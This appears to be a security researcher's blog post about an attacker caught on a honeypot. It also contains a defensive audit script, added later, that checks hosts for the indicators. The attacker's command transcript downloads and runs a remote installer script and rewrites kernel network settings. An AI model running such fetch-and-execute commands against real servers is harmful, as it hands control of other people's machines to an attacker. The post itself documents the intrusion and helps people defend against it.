I observed a hacker trying to compromise one of my internet-facing Linux servers and repurpose it to sell to unknowing legitimate customers.
Last year I built a system called Animus. In a nutshell, Animus is an intelligent system that discovers and reports information related to what bad guys are doing across the Internet and publishes the data free of charge. I won't go into how Animus works in this post because that is a blog post in and of itself. The important part is that Animus has discovered over 10,000 attacker IP addresses, identified hundreds of malware command and control (C2) servers, intercepted countless malware samples and hacker tools, and observed thousands of denial of service attacks against various websites. If you'd like more information on what Animus is or how it works, check out the talk I gave at Shmoocon 2015 called "No Budget Threat Intelligence".
A few days ago, Animus reported that a bad guy had attacked one of my sensors and attempted to download and install a backdoor. This is nothing unusual; I see hundreds of thousands of attacks every day.
The hacker gained access to my sensor by brute-forcing a username and password combination that I had deliberately configured the sensor to accept over SSH. What the hacker didn't realize is that I was logging everything she was doing.
The following is a recording of this particular hacker executing commands on my server, in real time, for your viewing pleasure:
If you don't feel like watching a terminal recording of someone slowly pasting commands into a Linux server like some kind of psychopath, here's a quick transcript of the commands she executed:
    wget http://huthos.com/script/minidebian7.sh
    chmod +x minidebian7.sh
    chmod +x minidebian7.sh
    chmod +x minidebian7.sh
    ./minidebian7.sh
    cat /etc/*release*
    cat /proc/version
    chmod +x minidebian7.sh
    ./minidebian7.sh
    cat /dev/net/tun
    echo 'net.core.wmem_max=12582912' >> /etc/sysctl.conf
    echo 'net.core.rmem_max=12582912' >> /etc/sysctl.conf
    echo 'net.ipv4.tcp_rmem= 10240 87380 12582912' >> /etc/sysctl.conf
    echo 'net.ipv4.tcp_wmem= 10240 87380 12582912' >> /etc/sysctl.conf
    echo 'net.ipv4.tcp_window_scaling = 1' >> /etc/sysctl.conf
    echo 'net.ipv4.tcp_timestamps = 1' >> /etc/sysctl.conf
    echo 'net.ipv4.tcp_sack = 1' >> /etc/sysctl.conf
    echo 'net.ipv4.tcp_no_metrics_save = 1' >> /etc/sysctl.conf
    echo 'net.core.netdev_max_backlog = 5000' >> /etc/sysctl.conf
    sysctl -p
    sysctl -p
The attack originated from the following IP address:
...which is located in Singapore. It also appears that the hacker's attack machine may be hosting an unauthenticated web proxy, according to Shodan, just in case you're wondering what the inside of their network looks like.
Let's dig into the attack a little bit.
Once the attacker logged in, she downloaded a shell script from the URL shown in the transcript above (http://huthos.com/script/minidebian7.sh) and attempted to execute it:
I uploaded a mirror of the shell script onto Pastebin, which can be accessed here. Basically, this shell script modifies some configurations of the victim server, uninstalls several packages, installs a Dropbear SSH server and a BadVPN peer-to-peer VPN gateway, installs Webmin, performs some hardening tasks, then reboots the server.
I don't believe this group is running a terribly huge operation, since this is the only attack I've seen from this IP address.
@Andrew___Morris Number of attacks from 126.96.36.199: 1 First attack: Apr 9, 2015 Most recent attack: Apr 9, 2015— Animus Threat Bot (@threatbot) April 12, 2015
Which raises another question...
so wtf is Huthos?
Turns out huthos.com is a company that "offers" "cloud" "services". And by offers cloud services, I mean they hack into machines on the internet and sell them to unknowing customers. God-awful website aside, they market themselves as a legitimate Indonesian VPS and VPN provider, which makes me want to cry.
Thanks to the site owner's poor operational security, I managed to find their real name, address, Facebook, Google Plus account, and YouTube channel in a few minutes. I won't post it on here because it isn't my intention to start a witch hunt.
If you're going to do evil things like this (first of all, don't. I will hunt you down and ruin your life) then you have to take a few steps to protect yourself. There are a few major fuckups here.
- Don't execute operations on honeypots. Do some recon during your targeting phase
- If you're conducting a widespread automated campaign, figure out a way to identify and avoid honeypots
- Don't host malware on your organization's website
- Don't host malware anywhere that can be tied to your identity
- Lock down your servers for God's sake
- Don't put your Facebook account in your malware samples
For everyone else, a few things worth doing on your own servers:
- Make sure you lock down any externally exposed administrative interfaces
- If you're using SSH, disable password authentication and configure SSH keys
- If you can't use SSH keys, use strong passwords
- Check your servers for the artifacts I've discussed today
- Check your logs for traffic to or from the attacker IP address
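To make the last few items concrete, here is a small audit script I'm adding as an example; it is not part of Animus and not something the original post shipped. It checks a Linux host for the specific things described above: SSH still accepting passwords, the exact sysctl lines the attacker appended, a dropped minidebian7.sh, Dropbear/BadVPN/Webmin sitting in their usual install locations (those paths are my assumptions, adjust for your distro), and any mention of an attacker IP in auth.log. It takes a root directory so it can be run against a constructed fixture tree as well as a live box; the fixture, the hostname and the 203.0.113.45 address in it are made up for the demonstration, and the real attacker IP is deliberately not used.

```shell
#!/bin/sh
# Added example, not from the original post or from Animus.
# Audit a Linux host for the artifacts left by the huthos.com installer.
#   audit_host ROOT ATTACKER_IP      (ROOT is "/" on a live host)
# Findings print one per line; lines starting with IOC are artifacts,
# WARN is a weak setting. audit_count returns the number of IOC lines.

# Literal lines the attacker appended to /etc/sysctl.conf (from the transcript).
SYSCTL_IOCS='net.core.wmem_max=12582912
net.core.rmem_max=12582912
net.ipv4.tcp_rmem= 10240 87380 12582912
net.ipv4.tcp_wmem= 10240 87380 12582912
net.core.netdev_max_backlog = 5000'

# Assumed install locations for the tools the script installs (adjust per distro).
TOOL_PATHS='usr/sbin/dropbear
usr/bin/badvpn-udpgw
usr/local/bin/badvpn-udpgw
etc/webmin
usr/share/webmin'

audit_host() {
  root="${1%/}"; ip="$2"

  # 1. Password logins still allowed over SSH (the access vector in this case).
  if grep -Eiq '^[[:space:]]*PasswordAuthentication[[:space:]]+yes' \
       "$root/etc/ssh/sshd_config" 2>/dev/null; then
    echo "WARN sshd_config allows PasswordAuthentication; switch to keys"
  fi

  # 2. The attacker's exact sysctl tuning lines (exact, whole-line match).
  printf '%s\n' "$SYSCTL_IOCS" | while IFS= read -r line; do
    if grep -Fqx "$line" "$root/etc/sysctl.conf" 2>/dev/null; then
      echo "IOC sysctl.conf contains attacker line: $line"
    fi
  done

  # 3. The dropped installer script anywhere on this filesystem.
  find "${root:-/}" -xdev -name 'minidebian7.sh' 2>/dev/null |
    sed 's/^/IOC dropped script: /'

  # 4. Dropbear, BadVPN and Webmin where they would normally land.
  printf '%s\n' "$TOOL_PATHS" | while IFS= read -r p; do
    [ -e "$root/$p" ] && echo "IOC installed tool present: /$p"
  done

  # 5. Any trace of the attacker IP in the SSH auth log.
  n=$(grep -Fc "$ip" "$root/var/log/auth.log" 2>/dev/null || true)
  [ "${n:-0}" -gt 0 ] && echo "IOC $n auth.log lines mention $ip"
  return 0
}

# Number of IOC lines, for cron jobs or tests.
audit_count() {
  audit_host "$1" "$2" | grep -c '^IOC' || true
}

# Constructed fixture: a fake root tree shaped like the sensor after the
# installer ran. Hostname, PIDs and the IP are invented, not captured data.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/etc/ssh" "$d/var/log" "$d/root" "$d/usr/sbin" "$d/etc/webmin"
  printf 'Port 22\nPasswordAuthentication yes\n' > "$d/etc/ssh/sshd_config"
  printf 'net.ipv4.ip_forward=0\n%s\n' "$SYSCTL_IOCS" > "$d/etc/sysctl.conf"
  : > "$d/root/minidebian7.sh"
  : > "$d/usr/sbin/dropbear"
  printf 'Apr  9 10:11:12 host sshd[123]: Failed password for root from %s port 51000 ssh2\nApr  9 10:11:20 host sshd[125]: Accepted password for admin from %s port 51004 ssh2\n' \
    "$1" "$1" > "$d/var/log/auth.log"
  echo "$d"
}

# Stand-alone demonstration against the fixture (9 IOC lines plus the WARN).
FIXTURE=$(make_fixture 203.0.113.45)
audit_host "$FIXTURE" 203.0.113.45
```

On a real host run `audit_host / <attacker-ip>` as root; the sysctl check matches whole lines exactly, so legitimate tuning with different values won't trip it, and a zero IOC count with a remaining WARN still means fix your sshd_config.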
Hopefully you've learned something from reading this post. If nothing else, it always warms my heart to make a bad guys life more difficult. If anyone has a law enforcement or CERT contact in Indonesia or Singapore, please shoot me an email.
And remember, I'm watching you.